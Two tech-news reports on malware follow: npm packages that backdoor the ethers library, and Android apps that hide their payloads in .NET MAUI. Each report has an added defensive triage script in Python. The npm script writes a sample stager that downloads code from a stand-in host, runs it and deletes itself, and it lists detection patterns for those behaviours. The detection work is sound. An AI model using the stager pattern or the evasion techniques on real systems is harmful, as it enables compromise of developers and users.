
Stealthy Npm Malware Backdoors Popular Ethereum Library

  • Written by Kiara Fabbri Former Tech News Writer
  • Fact-Checked by Sarah Frazier Former Content Manager

Security researchers at ReversingLabs have uncovered a sophisticated malware campaign targeting the npm package registry.

In a rush? Here are the quick facts:

  • The malicious npm packages ethers-provider2 and ethers-providerz plant a backdoor on systems that install them.
  • The malware works in several stages, ultimately patching the legitimate ethers package to embed a hidden reverse shell.
  • The attackers gain persistence by dropping a loader.js file, so the infection survives removal of the malicious package.

The malicious packages, ethers-provider2 and ethers-providerz, quietly patch a widely used npm package, ethers, to open a backdoor on infected systems. What sets them apart from run-of-the-mill npm malware is a multi-stage chain of downloading, patching and cleanup rather than a single malicious payload.

The packages pose as legitimate tools by copying the ssh2 package, which the researchers note has been downloaded more than 350 million times. On installation they download additional malicious code, which patches ethers to embed a concealed reverse shell that gives the attackers remote access.

ReversingLabs detected the threat with its Spectra platform. The infection starts when ethers-provider2 is installed: its install script downloads and runs a second-stage payload, which deletes itself after executing to hinder detection.

That second stage repeatedly checks whether ethers is installed locally and, once it finds the package, replaces its provider-jsonrpc.js with a trojanized copy that carries the hidden malicious code.

The attack does not stop there. The malware also drops a file named loader.js that keeps the infection alive even after ethers-provider2 itself has been removed.

In the third phase the attackers open a reverse shell connection, which lets them execute commands remotely through the package's SSH client code. ReversingLabs described the technique as evidence of an advanced threat actor whose activity warrants further investigation.

The researchers believe ethers-providerz was an earlier test version: its code contained several errors, but it followed the same pattern as the first malicious package.

At the time of reporting, ethers-provider2 was still available on npm, while ethers-providerz had already been removed.

The researchers advise developers to check their systems for signs of infection and to install only npm packages they trust.
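What the researchers describe is an install-time stager plus a patched dependency, and both leave traces a defender can check for. The Python script below is an added example, not ReversingLabs' tooling and not code from the packages themselves: it scans a node_modules tree for packages that declare lifecycle install hooks and flags hook scripts with download-and-execute indicators, then diffs an installed package's files against a known-good hash baseline so that a swapped provider-jsonrpc.js or an added loader.js stands out. The package names, the stager contents and the hash baseline are all constructed for the demo; in practice the baseline would come from the package tarball whose integrity hash is recorded in your lockfile.

```python
import hashlib
import json
import re
import tempfile
from pathlib import Path

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

# Behaviours typical of an install-time stager: fetch something, run it, cover tracks.
STAGER_INDICATORS = {
    "network_fetch": r"\bhttps?\.get\(|\bfetch\(",
    "child_process": r"\bchild_process\b",
    "spawns_process": r"\b(exec|spawn)(Sync)?\(",
    "self_delete": r"unlinkSync\(\s*__filename",
}


def sha256_file(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()


def snapshot(pkg_dir):
    """Map package-relative path -> sha256 for every file in an installed package."""
    return {p.relative_to(pkg_dir).as_posix(): sha256_file(p)
            for p in pkg_dir.rglob("*") if p.is_file()}


def audit_install_scripts(node_modules):
    """Report every package that runs a lifecycle hook and what its hook script does."""
    findings = []
    pkg_files = list(node_modules.glob("*/package.json")) + list(node_modules.glob("@*/*/package.json"))
    for pkg_json in sorted(pkg_files):
        pkg = json.loads(pkg_json.read_text())
        for hook in LIFECYCLE_HOOKS:
            cmd = pkg.get("scripts", {}).get(hook)
            if not cmd:
                continue
            hits = set()
            for token in cmd.split():  # resolve "node install.js" to the script it runs
                script = pkg_json.parent / token
                if script.is_file():
                    src = script.read_text(errors="ignore")
                    hits |= {name for name, pat in STAGER_INDICATORS.items() if re.search(pat, src)}
            findings.append({"package": pkg["name"], "hook": hook,
                             "command": cmd, "indicators": sorted(hits)})
    return findings


def diff_against_baseline(pkg_dir, baseline):
    """Compare the installed files with the hashes of the published package."""
    current = snapshot(pkg_dir)
    return {
        "modified": sorted(f for f in baseline if f in current and current[f] != baseline[f]),
        "added": sorted(f for f in current if f not in baseline),
        "missing": sorted(f for f in baseline if f not in current),
    }


def build_demo_tree(root):
    """Constructed sample tree: a clean ethers install (snapshotted as the baseline),
    then a hypothetical dropper package and the tampering the report describes."""
    nm = root / "node_modules"
    ethers = nm / "ethers"
    (ethers / "lib").mkdir(parents=True)
    (ethers / "package.json").write_text(json.dumps({"name": "ethers", "version": "6.0.0"}))
    (ethers / "lib" / "provider-jsonrpc.js").write_text("module.exports = { JsonRpcProvider: class {} };\n")
    baseline = snapshot(ethers)

    dropper = nm / "ethers-provider2"  # stand-in for the dropper; the stager below is made up
    dropper.mkdir()
    (dropper / "package.json").write_text(json.dumps(
        {"name": "ethers-provider2", "scripts": {"postinstall": "node install.js"}}))
    (dropper / "install.js").write_text(
        "const fs = require('fs'), https = require('https');\n"
        "const { execSync } = require('child_process');\n"
        "https.get('https://example.invalid/stage2', r => r.pipe(fs.createWriteStream('s.js'))\n"
        "  .on('finish', () => execSync('node s.js')));\n"
        "fs.unlinkSync(__filename);  // stage one removes itself\n")

    # The tampering: provider-jsonrpc.js swapped for a trojanized copy, loader.js dropped in.
    (ethers / "lib" / "provider-jsonrpc.js").write_text(
        "/* trojanized copy */ module.exports = { JsonRpcProvider: class {} };\n")
    (ethers / "lib" / "loader.js").write_text("require('./provider-jsonrpc.js');\n")
    return baseline


def run_demo():
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        baseline = build_demo_tree(root)
        return {"hooks": audit_install_scripts(root / "node_modules"),
                "ethers_diff": diff_against_baseline(root / "node_modules" / "ethers", baseline)}


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

Run against a real project, point audit_install_scripts at its node_modules and build the baseline by unpacking the tarball recorded in package-lock.json; any package with a lifecycle hook that both fetches from the network and spawns a process deserves a manual look, and any modified or added file inside a dependency is a red flag regardless of what installed it.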


Fake Banking And Social Apps Steal User Data Using .NET MAUI

  • Written by Kiara Fabbri Former Tech News Writer
  • Fact-Checked by Sarah Frazier Former Content Manager

A new wave of Android malware hides its payload inside apps built with Microsoft's .NET MAUI framework.

In a rush? Here are the quick facts:

  • The malicious apps steal banking credentials and personal data from their victims.
  • Multi-stage loading and encryption help the malware evade security scans.
  • The malware spreads through unofficial app stores and phishing links.

The McAfee Mobile Research Team discovered malware that uses .NET MAUI to slip past detection, allowing convincing fake apps to harvest user information.

.NET MAUI is Microsoft's successor to Xamarin; it lets developers build cross-platform applications that run on Android and iOS as well as Windows and macOS.

Criminals have turned the framework into a hiding place: their malicious logic sits in the app's .NET binary blobs, in one case additionally encrypted, rather than in the Android code that antivirus engines normally inspect.

The research team identified two separate campaigns built on .NET MAUI, one posing as a banking application and the other as a social media app.

The fake banking app, aimed at users in India, asks for personal and financial information as soon as it is launched and sends whatever the victim enters to an attacker-controlled server.

Traditional security tools miss the malware because its harmful code lives in .NET blob files rather than in the DEX bytecode and other standard Android components that scanners examine.

The second sample disguises itself as a social media application aimed at Chinese-speaking users. It wraps its malicious activity in several layers of encryption to conceal what it actually does.

This variant steals contacts, messages and photos without tripping security scanners. It tampers with the Android manifest's permission entries to throw off analysis tools, and it encrypts the stolen data before sending it to the attackers.

Both variants stayed undetected for long periods thanks to these evasion techniques. Heavy obfuscation, such as padding the manifest's permission settings with large amounts of meaningless entries, confuses security tools and disrupts analysis.
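A first-pass triage for the two evasion tricks above (logic moved out of classes.dex into the .NET runtime's assembly blob, and a manifest padded with meaningless permissions) can be written in a few lines. The script below is an added example, not McAfee's tooling: it lists an APK's zip entries to spot the MAUI/Xamarin runtime files, and parses the manifest to count uses-permission entries that fall outside the namespaces real permissions come from. It assumes the manifest has already been decoded from binary AXML to text (apktool or androguard can do this); the sample APK, package names and permission lists are constructed for the demo, and the prefix check stands in for a lookup against the SDK's full permission list.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Files the .NET MAUI / Xamarin.Android runtime ships inside an APK. When these are
# present, the app's real logic is in the assembly blob, not in classes.dex.
MAUI_MARKERS = (
    "assemblies/assemblies.blob",
    "lib/arm64-v8a/libmonodroid.so",
    "lib/arm64-v8a/libxamarin-app.so",
)
# Namespaces genuine permissions come from. Anything else is treated as padding here;
# a production tool would check each name against the SDK's full permission list.
KNOWN_PREFIXES = ("android.permission.", "com.google.android.", "com.android.")


def list_apk_entries(apk_bytes):
    """An APK is a zip file; the entry names alone reveal the runtime it was built on."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        return set(z.namelist())


def triage(entries, manifest_xml, padding_threshold=30):
    """entries: APK zip entry names. manifest_xml: AndroidManifest.xml decoded to text."""
    root = ET.fromstring(manifest_xml)
    perms = [e.get(ANDROID_NS + "name", "") for e in root.iter("uses-permission")]
    junk = [p for p in perms if not p.startswith(KNOWN_PREFIXES)]
    maui = sorted(m for m in MAUI_MARKERS if m in entries)
    padded = len(junk) >= padding_threshold
    return {
        "dotnet_maui": maui,               # where to look next: the assembly blob, not the dex
        "permission_count": len(perms),
        "junk_permissions": junk,
        "manifest_padding": padded,
        "suspicious": padded,              # a padded manifest has no legitimate purpose
    }


def build_manifest(package, permissions):
    """Constructed, already-decoded manifest text for the demo."""
    lines = [f'<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="{package}">']
    lines += [f'  <uses-permission android:name="{p}"/>' for p in permissions]
    lines += ['  <application android:label="app"/>', '</manifest>']
    return "\n".join(lines)


def build_sample_apk():
    """Constructed stand-in APK: MAUI runtime files plus a stub dex; contents are placeholders."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("classes.dex", b"dex\n035\0" + b"\0" * 32)
        z.writestr("assemblies/assemblies.blob", b"\0" * 128)
        z.writestr("lib/arm64-v8a/libmonodroid.so", b"\x7fELF" + b"\0" * 16)
    return buf.getvalue()


REAL_PERMS = ["android.permission.INTERNET", "android.permission.READ_CONTACTS",
              "android.permission.READ_SMS"]
# Meaningless entries of the kind used to pad a manifest (names are made up for the demo).
JUNK_PERMS = [f"com.{chr(97 + i % 26)}{i}.x.PERMISSION_{i}" for i in range(40)]


def run_demo():
    entries = list_apk_entries(build_sample_apk())
    return {
        "padded": triage(entries, build_manifest("com.example.fakebank", REAL_PERMS + JUNK_PERMS)),
        "clean": triage(entries, build_manifest("com.example.mauiapp", REAL_PERMS)),
    }


if __name__ == "__main__":
    for label, result in run_demo().items():
        print(label, result["suspicious"], result["permission_count"], result["dotnet_maui"])
```

The "clean" case shows why the two signals are reported separately: a legitimate .NET MAUI app also carries assemblies.blob and libmonodroid.so, so the runtime files on their own only tell an analyst to decompile the blob (for instance with ILSpy) instead of the dex, while the padded manifest is the part that justifies suspicion by itself.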

In light of these findings, anyone who wants to avoid becoming a victim should be extremely cautious about installing mobile apps from unknown sources.